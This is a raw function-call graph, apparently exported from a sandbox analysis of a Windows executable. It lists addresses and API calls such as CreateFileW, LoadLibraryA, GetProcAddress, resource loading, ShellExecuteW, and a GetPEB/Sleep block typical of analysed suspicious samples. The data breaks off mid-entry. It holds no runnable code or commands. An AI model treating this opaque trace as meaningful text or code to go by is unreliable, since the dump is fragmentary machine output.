e48123 59 API calls _memmove 97915->97929 97923 df7bb1 97916->97923 97919 df7cac 97919->97906 97920 e2f09e 97921 df81a7 59 API calls 97920->97921 97922 e2f0a6 Mailbox 97921->97922 97924 df7bbf 97923->97924 97928 df7be5 _memmove 97923->97928 97925 e10ff6 Mailbox 59 API calls 97924->97925 97924->97928 97926 df7c34 97925->97926 97927 e10ff6 Mailbox 59 API calls 97926->97927 97927->97928 97928->97919 97929->97920 97931 df4227 97930->97931 97932 e2d638 97930->97932 97931->97878 97934 e53226 62 API calls _W_store_winword 97931->97934 97932->97931 97933 e2d641 DestroyIcon 97932->97933 97933->97931 97934->97878 97935 e3220e GetTempPathW 97936 e3222b 97935->97936 97937 ff23b0 97951 ff0000 97937->97951 97939 ff244d 97954 ff22a0 97939->97954 97957 ff3470 GetPEB 97951->97957 97953 ff068b 97953->97939 97955 ff22a9 Sleep 97954->97955 97956 ff22b7 97955->97956 97958 ff349a 97957->97958 97958->97953 97959 dfb56e 97966 e0fb84 97959->97966 97961 dfb584 97975 dfc707 97961->97975 97963 dfb5ac 97965 dfa4e8 97963->97965 97987 e5a0b5 89 API calls 4 library calls 97963->97987 97967 e0fb90 97966->97967 97968 e0fba2 97966->97968 97969 df9e9c 60 API calls 97967->97969 97970 e0fbd1 97968->97970 97971 e0fba8 97968->97971 97974 e0fb9a 97969->97974 97973 df9e9c 60 API calls 97970->97973 97972 e10ff6 Mailbox 59 API calls 97971->97972 97972->97974 97973->97974 97974->97961 97976 df7b76 59 API calls 97975->97976 97977 dfc72c _wcscmp 97975->97977 97976->97977 97978 df7f41 59 API calls 97977->97978 97981 dfc760 Mailbox 97977->97981 97979 e31abb 97978->97979 97980 df7c8e 59 API calls 97979->97980 97982 e31ac6 97980->97982 97981->97963 97988 df859a 68 API calls 97982->97988 97984 e31ad7 97985 df9e9c 60 API calls 97984->97985 97986 e31adb Mailbox 97984->97986 97985->97986 97986->97963 97987->97965 97988->97984 97989 e17e93 97990 e17e9f __mtinitlocknum 97989->97990 98026 e1a048 GetStartupInfoW 97990->98026 97992 e17ea4 98028 e18dbc GetProcessHeap 97992->98028 97994 e17efc 97995 e17f07 97994->97995 98111 e17fe3 58 API calls 3 library calls 97994->98111 98029 e19d26 97995->98029 97998 e17f0d 97999 e17f18 __RTC_Initialize 97998->97999 98112 e17fe3 58 API calls 3 library calls 97998->98112 98050 e1d812 97999->98050 98002 e17f27 98003 e17f33 GetCommandLineW 98002->98003 98113 e17fe3 58 API calls 3 library calls 98002->98113 98069 e25173 GetEnvironmentStringsW 98003->98069 98006 e17f32 98006->98003 98009 e17f4d 98010 e17f58 98009->98010 98114 e132f5 58 API calls 3 library calls 98009->98114 98079 e24fa8 98010->98079 98013 e17f5e 98014 e17f69 98013->98014 98115 e132f5 58 API calls 3 library calls 98013->98115 98093 e1332f 98014->98093 98017 e17f71 98018 e17f7c __wwincmdln 98017->98018 98116 e132f5 58 API calls 3 library calls 98017->98116 98099 df492e 98018->98099 98021 e17f90 98022 e17f9f 98021->98022 98117 e13598 58 API calls _doexit 98021->98117 98118 e13320 58 API calls _doexit 98022->98118 98025 e17fa4 __mtinitlocknum 98027 e1a05e 98026->98027 98027->97992 98028->97994 98119 e133c7 36 API calls 2 library calls 98029->98119 98031 e19d2b 98120 e19f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 98031->98120 98033 e19d34 98121 e19d9c 61 API calls 2 library calls 98033->98121 98034 e19d30 98034->98033 98122 e19fca TlsAlloc 98034->98122 98037 e19d39 98037->97998 98038 e19d46 98038->98033 98039 e19d51 98038->98039 98123 e18a15 98039->98123 98042 e19d93 98131 e19d9c 61 API calls 2 library calls 98042->98131 98045 e19d72 98045->98042 98047 e19d78 98045->98047 98046 e19d98 98046->97998 98130 e19c73 58 API calls 4 library calls 98047->98130 98049 e19d80 GetCurrentThreadId 98049->97998 98051 e1d81e __mtinitlocknum 98050->98051 98052 e19e4b __lock 58 API calls 98051->98052 98053 e1d825 98052->98053 98054 e18a15 __calloc_crt 58 API calls 98053->98054 98056 e1d836 98054->98056 98055 e1d8a1 GetStartupInfoW 98063 e1d8b6 98055->98063 98065 e1d9e5 98055->98065 98056->98055 98057 e1d841 __mtinitlocknum @_EH4_CallFilterFunc@8 98056->98057 98057->98002 98058 e1daad 98145 e1dabd LeaveCriticalSection _doexit 98058->98145 98060 e18a15 __calloc_crt 58 API calls 98060->98063 98061 e1da32 GetStdHandle 98061->98065 98062 e1da45 GetFileType 98062->98065 98063->98060 98063->98065 98067 e1d904 98063->98067 98064 e1d938 GetFileType 98064->98067 98065->98058 98065->98061 98065->98062 98144 e1a06b InitializeCriticalSectionAndSpinCount 98065->98144 98067->98064 98067->98065 98143 e1a06b InitializeCriticalSectionAndSpinCount 98067->98143 98070 e25184 98069->98070 98071 e17f43 98069->98071 98146 e18a5d 58 API calls 2 library calls 98070->98146 98075 e24d6b GetModuleFileNameW 98071->98075 98073 e251c0 FreeEnvironmentStringsW 98073->98071 98074 e251aa _memmove 98074->98073 98076 e24d9f _wparse_cmdline 98075->98076 98078 e24ddf _wparse_cmdline 98076->98078 98147 e18a5d 58 API calls 2 library calls 98076->98147 98078->98009 98080 e24fc1 __wsetenvp 98079->98080 98081 e24fb9 98079->98081 98082 e18a15 __calloc_crt 58 API calls 98080->98082 98081->98013 98087 e24fea __wsetenvp 98082->98087 98083 e25041 98084 e12f95 _free 58 API calls 98083->98084 98084->98081 98085 e18a15 __calloc_crt 58 API calls 98085->98087 98086 e25066 98088 e12f95 _free 58 API calls 98086->98088 98087->98081 98087->98083 98087->98085 98087->98086 98090 e2507d 98087->98090 98148 e24857 58 API calls strtoxl 98087->98148 98088->98081 98149 e19006 IsProcessorFeaturePresent 98090->98149 98092 e25089 98092->98013 98094 e1333b __IsNonwritableInCurrentImage 98093->98094 98172 e1a711 98094->98172 98096 e13359 __initterm_e 98097 e12f80 __cinit 67 API calls 98096->98097 98098 e13378 _doexit __IsNonwritableInCurrentImage 98096->98098 98097->98098 98098->98017 98100 df4948 98099->98100 98110 df49e7 98099->98110 98101 df4982 IsThemeActive 98100->98101 98175 e135ac 98101->98175 98105 df49ae 98187 df4a5b SystemParametersInfoW SystemParametersInfoW 98105->98187 98107 df49ba 98188 df3b4c 98107->98188 98109 df49c2 SystemParametersInfoW 98109->98110 98110->98021 98111->97995 98112->97999 98113->98006 98117->98022 98118->98025 98119->98031 98120->98034 98121->98037 98122->98038 98124 e18a1c 98123->98124 98126 e18a57 98124->98126 98128 e18a3a 98124->98128 98132 e25446 98124->98132 98126->98042 98129 e1a026 TlsSetValue 98126->98129 98128->98124 98128->98126 98140 e1a372 Sleep 98128->98140 98129->98045 98130->98049 98131->98046 98133 e25451 98132->98133 98135 e2546c 98132->98135 98134 e2545d 98133->98134 98133->98135 98141 e18d68 58 API calls __getptd_noexit 98134->98141 98136 e2547c RtlAllocateHeap 98135->98136 98138 e25462 98135->98138 98142 e135e1 DecodePointer 98135->98142 98136->98135 98136->98138 98138->98124 98140->98128 98141->98138 98142->98135 98143->98067 98144->98065 98145->98057 98146->98074 98147->98078 98148->98087 98150 e19011 98149->98150 98155 e18e99 98150->98155 98154 e1902c 98154->98092 98156 e18eb3 _memset ___raise_securityfailure 98155->98156 98157 e18ed3 IsDebuggerPresent 98156->98157 98163 e1a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98157->98163 98160 e18fba 98162 e1a380 GetCurrentProcess TerminateProcess 98160->98162 98161 e18f97 ___raise_securityfailure 98164 e1c836 98161->98164 98162->98154 98163->98161 98165 e1c840 IsProcessorFeaturePresent 98164->98165 98166 e1c83e 98164->98166 98168 e25b5a 98165->98168 98166->98160 98171 e25b09 5 API calls ___raise_securityfailure 98168->98171 98170 e25c3d 98170->98160 98171->98170 98173 e1a714 EncodePointer 98172->98173 98173->98173 98174 e1a72e 98173->98174 98174->98096 98176 e19e4b __lock 58 API calls 98175->98176 98177 e135b7 DecodePointer EncodePointer 98176->98177 98240 e19fb5 LeaveCriticalSection 98177->98240 98179 df49a7 98180 e13614 98179->98180 98181 e13638 98180->98181 98182 e1361e 98180->98182 98181->98105 98182->98181 98241 e18d68 58 API calls __getptd_noexit 98182->98241 98184 e13628 98242 e18ff6 9 API calls strtoxl 98184->98242 98186 e13633 98186->98105 98187->98107 98189 df3b59 __write_nolock 98188->98189 98190 df77c7 59 API calls 98189->98190 98191 df3b63 GetCurrentDirectoryW 98190->98191 98243 df3778 98191->98243 98193 df3b8c IsDebuggerPresent 98194 df3b9a 98193->98194 98195 e2d4ad MessageBoxA 98193->98195 98196 df3c73 98194->98196 98198 e2d4c7 98194->98198 98199 df3bb7 98194->98199 98195->98198 98197 df3c7a SetCurrentDirectoryW 98196->98197 98201 df3c87 Mailbox 98197->98201 98442 df7373 59 API calls Mailbox 98198->98442 98324 df73e5 98199->98324 98201->98109 98203 e2d4d7 98208 e2d4ed SetCurrentDirectoryW 98203->98208 98205 df3bd5 GetFullPathNameW 98206 df7d2c 59 API calls 98205->98206 98207 df3c10 98206->98207 98340 e00a8d 98207->98340 98208->98201 98211 df3c2e 98212 df3c38 98211->98212 98443 e54c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98211->98443 98356 df3a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98212->98356 98216 e2d50a 98216->98212 98218 e2d51b 98216->98218 98220 df4864 61 API calls 98218->98220 98219 df3c42 98221 df3c55 98219->98221 98224 df43db 68 API calls 98219->98224 98223 e2d523 98220->98223 98364 e00b30 98221->98364 98226 df7f41 59 API calls 98223->98226 98224->98221 98227 e2d530 98226->98227 98229 e2d53a 98227->98229 98230 e2d55f 98227->98230 98232 df7e0b 59 API calls 98229->98232 98231 df7e0b 59 API calls 98230->98231 98234 e2d55b GetForegroundWindow ShellExecuteW 98231->98234 98233 e2d545 98232->98233 98235 df7c8e 59 API calls 98233->98235 98238 e2d58f Mailbox 98234->98238 98238->98196 98240->98179 98241->98184 98242->98186 98244 df77c7 59 API calls 98243->98244 98245 df378e 98244->98245 98444 df3d43 98245->98444 98247 df37ac 98248 df4864 61 API calls 98247->98248 98249 df37c0 98248->98249 98250 df7f41 59 API calls 98249->98250 98251 df37cd 98250->98251 98458 df4f3d 98251->98458 98254 df37ee Mailbox 98259 df81a7 59 API calls 98254->98259 98255 e2d3ae 98514 e597e5 98255->98514 98258 e2d3cd 98261 e12f95 _free 58 API calls 98258->98261 98262 df3801 98259->98262 98263 e2d3da 98261->98263 98482 df93ea 98262->98482 98265 df4faa 84 API calls 98263->98265 98267 e2d3e3 98265->98267 98271 df3ee2 59 API calls 98267->98271 98268 df7f41 59 API calls 98269 df381a 98268->98269 98485 df8620 98269->98485 98273 e2d3fe 98271->98273 98272 df382c Mailbox 98274 df7f41 59 API calls 98272->98274 98275 df3ee2 59 API calls 98273->98275 98276 df3852 98274->98276 98277 e2d41a 98275->98277 98278 df8620 69 API calls 98276->98278 98279 df4864 61 API calls 98277->98279 98281 df3861 Mailbox 98278->98281 98280 e2d43f 98279->98280 98282 df3ee2 59 API calls 98280->98282 98284 df77c7 59 API calls 98281->98284 98283 e2d44b 98282->98283 98285 df81a7 59 API calls 98283->98285 98286 df387f 98284->98286 98287 e2d459 98285->98287 98489 df3ee2 98286->98489 98289 df3ee2 59 API calls 98287->98289 98291 e2d468 98289->98291 98297 df81a7 59 API calls 98291->98297 98293 df3899 98293->98267 98294 df38a3 98293->98294 98295 e1313d _W_store_winword 60 API calls 98294->98295 98296 df38ae 98295->98296 98296->98273 98298 df38b8 98296->98298 98299 e2d48a 98297->98299 98300 e1313d _W_store_winword 60 API calls 98298->98300 98301 df3ee2 59 API calls 98299->98301 98302 df38c3 98300->98302 98303 e2d497 98301->98303 98302->98277 98304 df38cd 98302->98304 98303->98303 98305 e1313d _W_store_winword 60 API calls 98304->98305 98306 df38d8 98305->98306 98306->98291 98307 df3919 98306->98307 98309 df3ee2 59 API calls 98306->98309 98307->98291 98308 df3926 98307->98308 98310 df942e 59 API calls 98308->98310 98311 df38fc 98309->98311 98312 df3936 98310->98312 98313 df81a7 59 API calls 98311->98313 98314 df91b0 59 API calls 98312->98314 98315 df390a 98313->98315 98316 df3944 98314->98316 98317 df3ee2 59 API calls 98315->98317 98505 df9040 98316->98505 98317->98307 98319 df93ea 59 API calls 98321 df3961 98319->98321 98320 df9040 60 API calls 98320->98321 98321->98319 98321->98320 98322 df3ee2 59 API calls 98321->98322 98323 df39a7 Mailbox 98321->98323 98322->98321 98323->98193 98325 df73f2 __write_nolock 98324->98325 98326 df740b 98325->98326 98327 e2ee4b _memset 98325->98327 98328 df48ae 60 API calls 98326->98328 98329 e2ee67 GetOpenFileNameW 98327->98329 98330 df7414 98328->98330 98332 e2eeb6 98329->98332 99359 e109d5 98330->99359 98334 df7d2c 59 API calls 98332->98334 98336 e2eecb 98334->98336 98336->98336 98337 df7429 99377 df69ca 98337->99377 98341 e00a9a __write_nolock 98340->98341 99605 df6ee0 98341->99605 98343 e00a9f 98355 df3c26 98343->98355 99616 e012fe 89 API calls 98343->99616 98345 e00aac 98345->98355 99617 e04047 91 API calls Mailbox 98345->99617 98347 e00ab5 98348 e00ab9 GetFullPathNameW 98347->98348 98347->98355 98349 df7d2c 59 API calls 98348->98349 98350 e00ae5 98349->98350 98351 df7d2c 59 API calls 98350->98351 98352 e00af2 98351->98352 98353 e350d5 _wcscat 98352->98353 98354 df7d2c 59 API calls 98352->98354 98354->98355 98355->98203 98355->98211 98357 df3ac2 LoadImageW RegisterClassExW 98356->98357 98358 e2d49c 98356->98358 99622 df3041 7 API calls 98357->99622 99623 df48fe LoadImageW EnumResourceNamesW 98358->99623 98361 e2d4a5 98362 df3b46 98363 df39e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98362->98363 98363->98219 98365 e350ed 98364->98365 98379 e00b55 98364->98379 98440 e00b65 Mailbox 98379->98440 99770 df9fbd 60 API calls 98379->99770 99771 e468bf 341 API calls 98379->99771 98442->98203 98443->98216 98445 df3d50 __write_nolock 98444->98445 98446 df7d2c 59 API calls 98445->98446 98451 df3eb6 Mailbox 98445->98451 98448 df3d82 98446->98448 98457 df3db8 Mailbox 98448->98457 98555 df7b52 98448->98555 98449 df7b52 59 API calls 98449->98457 98450 df7f41 59 API calls 98454 df3eaa 98450->98454 98451->98247 98452 df3e89 98452->98450 98452->98451 98453 df7f41 59 API calls 98453->98457 98455 df3f84 59 API calls 98454->98455 98455->98451 98456 df3f84 59 API calls 98456->98457 98457->98449 98457->98451 98457->98452 98457->98453 98457->98456 98558 df4d13 98458->98558 98463 df4f68 LoadLibraryExW 98568 df4cc8 98463->98568 98464 e2dd0f 98466 df4faa 84 API calls 98464->98466 98468 e2dd16 98466->98468 98470 df4cc8 3 API calls 98468->98470 98471 e2dd1e 98470->98471 98594 df506b 98471->98594 98472 df4f8f 98472->98471 98473 df4f9b 98472->98473 98475 df4faa 84 API calls 98473->98475 98477 df37e6 98475->98477 98477->98254 98477->98255 98479 e2dd45 98602 df5027 98479->98602 98481 e2dd52 98483 e10ff6 Mailbox 59 API calls 98482->98483 98484 df380d 98483->98484 98484->98268 98486 df862b 98485->98486 98488 df8652 98486->98488 99029 df8b13 69 API calls Mailbox 98486->99029 98488->98272 98490 df3eec 98489->98490 98491 df3f05 98489->98491 98492 df81a7 59 API calls 98490->98492 98493 df7d2c 59 API calls 98491->98493 98494 df388b 98492->98494 98493->98494 98495 e1313d 98494->98495 98496 e131be 98495->98496 98497 e13149 98495->98497 99032 e131d0 60 API calls 3 library calls 98496->99032 98504 e1316e 98497->98504 99030 e18d68 58 API calls __getptd_noexit 98497->99030 98499 e131cb 98499->98293 98501 e13155 99031 e18ff6 9 API calls strtoxl 98501->99031 98503 e13160 98503->98293 98504->98293 98506 e2f5a5 98505->98506 98508 df9057 98505->98508 98506->98508 99033 df8d3b 59 API calls Mailbox 98506->99033 98509 df9158 98508->98509 98510 df91a0 98508->98510 98513 df915f 98508->98513 98512 e10ff6 Mailbox 59 API calls 98509->98512 98511 df9e9c 60 API calls 98510->98511 98511->98513 98512->98513 98513->98321 98515 df5045 85 API calls 98514->98515 98516 e59854 98515->98516 99034 e599be 98516->99034 98519 df506b 74 API calls 98520 e59881 98519->98520 98521 df506b 74 API calls 98520->98521 98522 e59891 98521->98522 98523 df506b 74 API calls 98522->98523 98524 e598ac 98523->98524 98525 df506b 74 API calls 98524->98525 98526 e598c7 98525->98526 98527 df5045 85 API calls 98526->98527 98528 e598de 98527->98528 98529 e1594c std::exception::_Copy_str 58 API calls 98528->98529 98530 e598e5 98529->98530 98531 e1594c std::exception::_Copy_str 58 API calls 98530->98531 98532 e598ef 98531->98532 98533 df506b 74 API calls 98532->98533 98534 e59903 98533->98534 98535 e59393 GetSystemTimeAsFileTime 98534->98535 98536 e59916 98535->98536 98537 e59940 98536->98537 98538 e5992b 98536->98538 98539 e599a5 98537->98539 98540 e59946 98537->98540 98541 e12f95 _free 58 API calls 98538->98541 98544 e12f95 _free 58 API calls 98539->98544 99040 e58d90 98540->99040 98542 e59931 98541->98542 98545 e12f95 _free 58 API calls 98542->98545 98547 e2d3c1 98544->98547 98545->98547 98547->98258 98549 df4faa 98547->98549 98548 e12f95 _free 58 API calls 98548->98547 98550 df4fb4 98549->98550 98552 df4fbb 98549->98552 98551 e155d6 __fcloseall 83 API calls 98550->98551 98551->98552 98553 df4fdb FreeLibrary 98552->98553 98554 df4fca 98552->98554 98553->98554 98554->98258 98556 df7faf 59 API calls 98555->98556 98557 df7b5d 98556->98557 98557->98448 98607 df4d61 98558->98607 98561 df4d61 2 API calls 98564 df4d3a 98561->98564 98562 df4d4a FreeLibrary 98563 df4d53 98562->98563 98565 e1548b 98563->98565 98564->98562 98564->98563 98611 e154a0 98565->98611 98567 df4f5c 98567->98463 98567->98464 98769 df4d94 98568->98769 98571 df4ced 98572 df4cff FreeLibrary 98571->98572 98573 df4d08 98571->98573 98572->98573 98575 df4dd0 98573->98575 98574 df4d94 2 API calls 98574->98571 98576 e10ff6 Mailbox 59 API calls 98575->98576 98577 df4de5 98576->98577 98578 df538e 59 API calls 98577->98578 98579 df4df1 _memmove 98578->98579 98580 df4e2c 98579->98580 98582 df4ee9 98579->98582 98583 df4f21 98579->98583 98581 df5027 69 API calls 98580->98581 98590 df4e35 98581->98590 98773 df4fe9 CreateStreamOnHGlobal 98582->98773 98784 e59ba5 95 API calls 98583->98784 98586 df506b 74 API calls 98586->98590 98588 e2dcd0 98589 df5045 85 API calls 98588->98589 98591 e2dce4 98589->98591 98590->98586 98590->98588 98593 df4ec9 98590->98593 98779 df5045 98590->98779 98592 df506b 74 API calls 98591->98592 98592->98593 98593->98472 98595 df507d 98594->98595 98596 e2ddf6 98594->98596 98808 e15812 98595->98808 98599 e59393 99006 e591e9 98599->99006 98601 e593a9 98601->98479 98603 df5036 98602->98603 98604 e2ddb9 98602->98604 99011 e15e90 98603->99011 98606 df503e 98606->98481 98608 df4d2e 98607->98608 98609 df4d6a LoadLibraryA 98607->98609 98608->98561 98608->98564 98609->98608 98610 df4d7b GetProcAddress 98609->98610 98610->98608 98614 e154ac __mtinitlocknum 98611->98614 98612 e154bf 98660 e18d68 58 API calls __getptd_noexit 98612->98660 98614->98612 98616 e154f0 98614->98616 98615 e154c4 98661 e18ff6 9 API calls strtoxl 98615->98661 98630 e20738 98616->98630 98619 e154f5 98620 e1550b 98619->98620 98621 e154fe 98619->98621 98623 e15535 98620->98623 98624 e15515 98620->98624 98662 e18d68 58 API calls __getptd_noexit 98621->98662 98645 e20857 98623->98645 98663 e18d68 58 API calls __getptd_noexit 98624->98663 98627 e154cf __mtinitlocknum @_EH4_CallFilterFunc@8 98627->98567 98631 e20744 __mtinitlocknum 98630->98631 98632 e19e4b __lock 58 API calls 98631->98632 98633 e20752 98632->98633 98634 e207cd 98633->98634 98641 e19ed3 __mtinitlocknum 58 API calls 98633->98641 98643 e207c6 98633->98643 98668 e16e8d 59 API calls __lock 98633->98668 98669 e16ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98633->98669 98670 e18a5d 58 API calls 2 library calls 98634->98670 98637 e207d4 98637->98643 98671 e1a06b InitializeCriticalSectionAndSpinCount 98637->98671 98639 e20843 __mtinitlocknum 98639->98619 98641->98633 98642 e207fa EnterCriticalSection 98642->98643 98665 e2084e 98643->98665 98654 e20877 __wopenfile 98645->98654 98646 e20891 98676 e18d68 58 API calls __getptd_noexit 98646->98676 98647 e20a4c 98647->98646 98651 e20aaf 98647->98651 98649 e20896 98677 e18ff6 9 API calls strtoxl 98649->98677 98673 e287f1 98651->98673 98652 e15540 98664 e15562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98652->98664 98654->98646 98654->98647 98678 e13a0b 60 API calls 2 library calls 98654->98678 98656 e20a45 98656->98647 98679 e13a0b 60 API calls 2 library calls 98656->98679 98658 e20a64 98658->98647 98680 e13a0b 60 API calls 2 library calls 98658->98680 98660->98615 98661->98627 98662->98627 98663->98627 98664->98627 98672 e19fb5 LeaveCriticalSection 98665->98672 98667 e20855 98667->98639 98668->98633 98669->98633 98670->98637 98671->98642 98672->98667 98681 e27fd5 98673->98681 98675 e2880a 98675->98652 98676->98649 98677->98652 98678->98656 98679->98658 98680->98647 98682 e27fe1 __mtinitlocknum 98681->98682 98683 e27ff7 98682->98683 98686 e2802d 98682->98686 98766 e18d68 58 API calls __getptd_noexit 98683->98766 98685 e27ffc 98767 e18ff6 9 API calls strtoxl 98685->98767 98692 e2809e 98686->98692 98689 e28049 98768 e28072 LeaveCriticalSection __unlock_fhandle 98689->98768 98691 e28006 __mtinitlocknum 98691->98675 98693 e280be 98692->98693 98694 e1471a __wsopen_nolock 58 API calls 98693->98694 98696 e280da 98694->98696 98695 e19006 __invoke_watson 8 API calls 98697 e287f0 98695->98697 98698 e28114 98696->98698 98705 e28137 98696->98705 98714 e28211 98696->98714 98699 e27fd5 __wsopen_helper 103 API calls 98697->98699 98700 e18d34 __read_nolock 58 API calls 98698->98700 98701 e2880a 98699->98701 98702 e28119 98700->98702 98701->98689 98703 e18d68 strtoxl 58 API calls 98702->98703 98704 e28126 98703->98704 98707 e18ff6 strtoxl 9 API calls 98704->98707 98706 e281f5 98705->98706 98710 e281d3 98705->98710 98708 e18d34 __read_nolock 58 API calls 98706->98708 98734 e28130 98707->98734 98709 e281fa 98708->98709 98711 e18d68 strtoxl 58 API calls 98709->98711 98715 e1d4d4 __alloc_osfhnd 61 API calls 98710->98715 98712 e28207 98711->98712 98713 e18ff6 strtoxl 9 API calls 98712->98713 98713->98714 98714->98695 98716 e282a1 98715->98716 98717 e282ab 98716->98717 98718 e282ce 98716->98718 98719 e18d34 __read_nolock 58 API calls 98717->98719 98720 e27f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98718->98720 98721 e282b0 98719->98721 98731 e282f0 98720->98731 98722 e18d68 strtoxl 58 API calls 98721->98722 98724 e282ba 98722->98724 98723 e2836e GetFileType 98725 e283bb 98723->98725 98726 e28379 GetLastError 98723->98726 98729 e18d68 strtoxl 58 API calls 98724->98729 98737 e1d76a __set_osfhnd 59 API calls 98725->98737 98730 e18d47 __dosmaperr 58 API calls 98726->98730 98727 e2833c GetLastError 98728 e18d47 __dosmaperr 58 API calls 98727->98728 98733 e28361 98728->98733 98729->98734 98735 e283a0 CloseHandle 98730->98735 98731->98723 98731->98727 98732 e27f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98731->98732 98736 e28331 98732->98736 98739 e18d68 strtoxl 58 API calls 98733->98739 98734->98689 98735->98733 98738 e283ae 98735->98738 98736->98723 98736->98727 98743 e283d9 98737->98743 98740 e18d68 strtoxl 58 API calls 98738->98740 98739->98714 98741 e283b3 98740->98741 98741->98733 98742 e28594 98742->98714 98745 e28767 CloseHandle 98742->98745 98743->98742 98744 e21b11 __lseeki64_nolock 60 API calls 98743->98744 98760 e2845a 98743->98760 98746 e28443 98744->98746 98747 e27f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98745->98747 98749 e18d34 __read_nolock 58 API calls 98746->98749 98746->98760 98748 e2878e 98747->98748 98750 e28796 GetLastError 98748->98750 98751 e287c2 98748->98751 98749->98760 98752 e18d47 __dosmaperr 58 API calls 98750->98752 98751->98714 98754 e287a2 98752->98754 98753 e2848c 98757 e299f2 __chsize_nolock 82 API calls 98753->98757 98753->98760 98758 e1d67d __free_osfhnd 59 API calls 98754->98758 98755 e210ab 70 API calls __read_nolock 98755->98760 98756 e20d2d __close_nolock 61 API calls 98756->98760 98757->98753 98758->98751 98759 e1dac6 __write 78 API calls 98759->98760 98760->98742 98760->98753 98760->98755 98760->98756 98760->98759 98761 e28611 98760->98761 98765 e21b11 60 API calls __lseeki64_nolock 98760->98765 98762 e20d2d __close_nolock 61 API calls 98761->98762 98763 e28618 98762->98763 98764 e18d68 strtoxl 58 API calls 98763->98764 98764->98714 98765->98760 98766->98685 98767->98691 98768->98691 98770 df4ce1 98769->98770 98771 df4d9d LoadLibraryA 98769->98771 98770->98571 98770->98574 98771->98770 98772 df4dae GetProcAddress 98771->98772 98772->98770 98774 df5003 FindResourceExW 98773->98774 98776 df5020 98773->98776 98775 e2dd5c LoadResource 98774->98775 98774->98776 98775->98776 98777 e2dd71 SizeofResource 98775->98777 98776->98580 98777->98776 98778 e2dd85 LockResource 98777->98778 98778->98776 98780 e2ddd4 98779->98780 98781 df5054 98779->98781 98785 e15a7d 98781->98785 98783 df5062 98783->98590 98784->98580 98786 e15a89 __mtinitlocknum 98785->98786 98787 e15a9b 98786->98787 98789 e15ac1 98786->98789 98798 e18d68 58 API calls __getptd_noexit 98787->98798 98800 e16e4e 98789->98800 98790 e15aa0 98799 e18ff6 9 API calls strtoxl 98790->98799 98793 e15ac7 98806 e159ee 83 API calls 5 library calls 98793->98806 98795 e15ad6 98807 e15af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98795->98807 98797 e15aab __mtinitlocknum 98797->98783 98798->98790 98799->98797 98801 e16e80 EnterCriticalSection 98800->98801 98802 e16e5e 98800->98802 98803 e16e76 98801->98803 98802->98801 98804 e16e66 98802->98804 98803->98793 98805 e19e4b __lock 58 API calls 98804->98805 98805->98803 98806->98795 98807->98797 98811 e1582d 98808->98811 98810 df508e 98810->98599 98812 e15839 __mtinitlocknum 98811->98812 98813 e1587c 98812->98813 98814 e1584f _memset 98812->98814 98823 e15874 __mtinitlocknum 98812->98823 98815 e16e4e __lock_file 59 API calls 98813->98815 98838 e18d68 58 API calls __getptd_noexit 98814->98838 98816 e15882 98815->98816 98824 e1564d 98816->98824 98819 e15869 98839 e18ff6 9 API calls strtoxl 98819->98839 98823->98810 98827 e15668 _memset 98824->98827 98829 e15683 98824->98829 98825 e15673 98936 e18d68 58 API calls __getptd_noexit 98825->98936 98827->98825 98827->98829 98834 e156c3 98827->98834 98840 e158b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98829->98840 98831 e157d4 _memset 98939 e18d68 58 API calls __getptd_noexit 98831->98939 98834->98829 98834->98831 98841 e14916 98834->98841 98848 e210ab 98834->98848 98916 e20df7 98834->98916 98938 e20f18 58 API calls 3 library calls 98834->98938 98837 e15678 98937 e18ff6 9 API calls strtoxl 98837->98937 98838->98819 98839->98823 98840->98823 98842 e14920 98841->98842 98843 e14935 98841->98843 98940 e18d68 58 API calls __getptd_noexit 98842->98940 98843->98834 98845 e14925 98941 e18ff6 9 API calls strtoxl 98845->98941 98847 e14930 98847->98834 98849 e210e3 98848->98849 98850 e210cc 98848->98850 98852 e2181b 98849->98852 98856 e2111d 98849->98856 98951 e18d34 58 API calls __getptd_noexit 98850->98951 98967 e18d34 58 API calls __getptd_noexit 98852->98967 98853 e210d1 98952 e18d68 58 API calls __getptd_noexit 98853->98952 98858 e21125 98856->98858 98865 e2113c 98856->98865 98857 e21820 98968 e18d68 58 API calls __getptd_noexit 98857->98968 98953 e18d34 58 API calls __getptd_noexit 98858->98953 98861 e21131 98969 e18ff6 9 API calls strtoxl 98861->98969 98862 e2112a 98954 e18d68 58 API calls __getptd_noexit 98862->98954 98864 e21151 98955 e18d34 58 API calls __getptd_noexit 98864->98955 98865->98864 98867 e2116b 98865->98867 98869 e21189 98865->98869 98896 e210d8 98865->98896 98867->98864 98872 e21176 98867->98872 98956 e18a5d 58 API calls 2 library calls 98869->98956 98942 e25ebb 98872->98942 98873 e21199 98874 e211a1 98873->98874 98875 e211bc 98873->98875 98957 e18d68 58 API calls __getptd_noexit 98874->98957 98959 e21b11 60 API calls 3 library calls 98875->98959 98876 e2128a 98878 e21303 ReadFile 98876->98878 98883 e212a0 GetConsoleMode 98876->98883 98881 e217e3 GetLastError 98878->98881 98882 e21325 98878->98882 98880 e211a6 98958 e18d34 58 API calls __getptd_noexit 98880->98958 98885 e217f0 98881->98885 98886 e212e3 98881->98886 98882->98881 98890 e212f5 98882->98890 98887 e21300 98883->98887 98888 e212b4 98883->98888 98965 e18d68 58 API calls __getptd_noexit 98885->98965 98898 e212e9 98886->98898 98960 e18d47 58 API calls 3 library calls 98886->98960 98887->98878 98888->98887 98891 e212ba ReadConsoleW 98888->98891 98890->98898 98899 e2135a 98890->98899 98908 e215c7 98890->98908 98891->98890 98893 e212dd GetLastError 98891->98893 98892 e217f5 98966 e18d34 58 API calls __getptd_noexit 98892->98966 98893->98886 98896->98834 98897 e12f95 _free 58 API calls 98897->98896 98898->98896 98898->98897 98900 e213c6 ReadFile 98899->98900 98906 e21447 98899->98906 98903 e213e7 GetLastError 98900->98903 98914 e213f1 98900->98914 98902 e216cd ReadFile 98909 e216f0 GetLastError 98902->98909 98915 e216fe 98902->98915 98903->98914 98904 e21504 98910 e214b4 MultiByteToWideChar 98904->98910 98963 